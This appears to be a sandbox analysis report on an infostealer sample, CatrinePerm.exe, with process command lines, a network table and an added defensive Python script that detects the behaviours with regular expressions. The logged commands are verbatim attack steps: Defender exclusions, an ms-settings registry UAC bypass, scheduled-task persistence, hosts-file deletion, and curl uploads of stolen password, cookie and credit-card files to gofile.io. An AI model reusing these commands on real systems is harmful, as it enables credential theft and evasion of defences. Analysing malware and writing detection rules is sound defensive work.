"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2958:84:7zEvent12321
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"
C:\Users\Admin\AppData\Roaming\Win (3).exe
"C:\Users\Admin\AppData\Roaming\Win (3).exe"
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinRAR.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
C:\Users\Admin\AppData\Roaming\Win (3).exe
"C:\Users\Admin\AppData\Roaming\Win (3).exe"
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3088 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe
"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" Taskmgr.exe
C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe
"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" explorer.exe
C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"
C:\Users\Admin\AppData\Roaming\Win (3).exe
"C:\Users\Admin\AppData\Roaming\Win (3).exe"
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
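The command lines above carry, verbatim, the behaviours the signature list summarises: Defender exclusions added with Add-MpPreference, the HKCU\Software\Classes\ms-settings\shell\open\command hijack with DelegateExecute followed by a launch of computerdefaults.exe (the auto-elevation UAC bypass), scheduled tasks created with /RL HIGHEST, curl -F uploads of the collected cs*.txt files to gofile.io, and deletion of the hosts file. The script below is an added example, not part of the sandbox report or of the sample; it runs regular-expression rules for each of those behaviours over a constructed subset of the command lines copied from the list above, plus two benign-looking lines as controls. The fodhelper.exe alternative in the auto-elevation rule is an addition from the author's own knowledge of the technique, not something that appears in this report.

```python
r"""Behaviour triage over the command lines in the Processes list above.

Added example for this page, not tooling from the sandbox or the sample.
Each rule encodes one behaviour visible verbatim in the report: Defender
exclusions via Add-MpPreference, the ms-settings\shell\open\command hijack
with DelegateExecute, a launch of an auto-elevating binary (computerdefaults
here; fodhelper is an addition), schtasks persistence with /RL HIGHEST,
curl -F uploads to gofile.io, and deletion of the hosts file.
"""
import re
from collections import defaultdict

# Command lines copied from the Processes list above (constructed subset:
# one or two lines per behaviour, plus two benign-looking controls).
SAMPLE_CMDLINES = r'''
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinRAR.exe'
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs" /f
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
computerdefaults.exe
schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile"
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
"C:\Windows\system32\taskmgr.exe" /7
'''.strip().splitlines()

RULES = {
    # Any Add-MpPreference -Exclusion* is Defender tampering from a user process.
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)\b", re.I),
    # The per-user ms-settings ProgID is consulted by auto-elevating binaries.
    "ms_settings_hijack": re.compile(
        r'reg(\.exe)?"?\s+add\s+"?HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command', re.I),
    # Second half of the bypass: launching a binary that honours that key.
    "auto_elevate_launch": re.compile(
        r'(^|[\\\s"])(computerdefaults|fodhelper)\.exe\b', re.I),
    # Task creation requesting the highest run level.
    "schtasks_persistence": re.compile(
        r'schtasks(\.exe)?"?\s+/create\b.*/RL\s+HIGHEST\b', re.I),
    # Multipart upload of a local file to a public file-sharing host.
    "curl_upload_filehost": re.compile(
        r'\bcurl(\.exe)?\s+-F\s+"?file=@.*https?://[\w.-]*gofile\.io/', re.I),
    "hosts_file_tamper": re.compile(
        r"\bdel\s+C:\\Windows\\System32\\drivers\\etc\\hosts\b", re.I),
}


def classify(cmdline):
    """Names of all rules that match one command line, sorted."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage(cmdlines):
    """Map each matched behaviour to the command lines that triggered it."""
    hits = defaultdict(list)
    for line in cmdlines:
        for name in classify(line):
            hits[name].append(line)
    return dict(hits)


def uac_bypass_chain(cmdlines):
    """True only when both halves of the bypass are present: the ms-settings
    key is written and an auto-elevating binary that reads it is launched."""
    seen = {tag for line in cmdlines for tag in classify(line)}
    return {"ms_settings_hijack", "auto_elevate_launch"} <= seen


def exfil_targets(cmdlines):
    """Local paths handed to curl -F file=@..., deduplicated in first-seen order."""
    out = []
    for line in cmdlines:
        for path in re.findall(r'file=@([^"\s]+)', line):
            if path not in out:
                out.append(path)
    return out


if __name__ == "__main__":
    for name, lines in sorted(triage(SAMPLE_CMDLINES).items()):
        print(f"{name}: {len(lines)} line(s)")
    print("UAC bypass chain complete:", uac_bypass_chain(SAMPLE_CMDLINES))
    print("Uploaded files:", exfil_targets(SAMPLE_CMDLINES))
```

Run against the full list the same rules also catch the repeated Update.exe exclusions and the second round of gofile uploads; uac_bypass_chain deliberately requires both the registry write and the launcher, because either alone is a weaker signal (the key alone is a common false positive from software that registers ms-settings handlers, and computerdefaults.exe is launched legitimately from Settings).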
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| GB | 92.123.128.133:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store5.gofile.io | udp |
| FR | 31.14.70.250:443 | store5.gofile.io | tcp |
| FR | 31.14.70.250:443 | store5.gofile.io | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| FR | 31.14.70.250:443 | store5.gofile.io | tcp |
| US | 8.8.8.8:53 | 250.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.95.21.104.in-addr.arpa | udp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | textpubshiers.top | udp |
| US | 172.67.146.76:443 | textpubshiers.top | tcp |
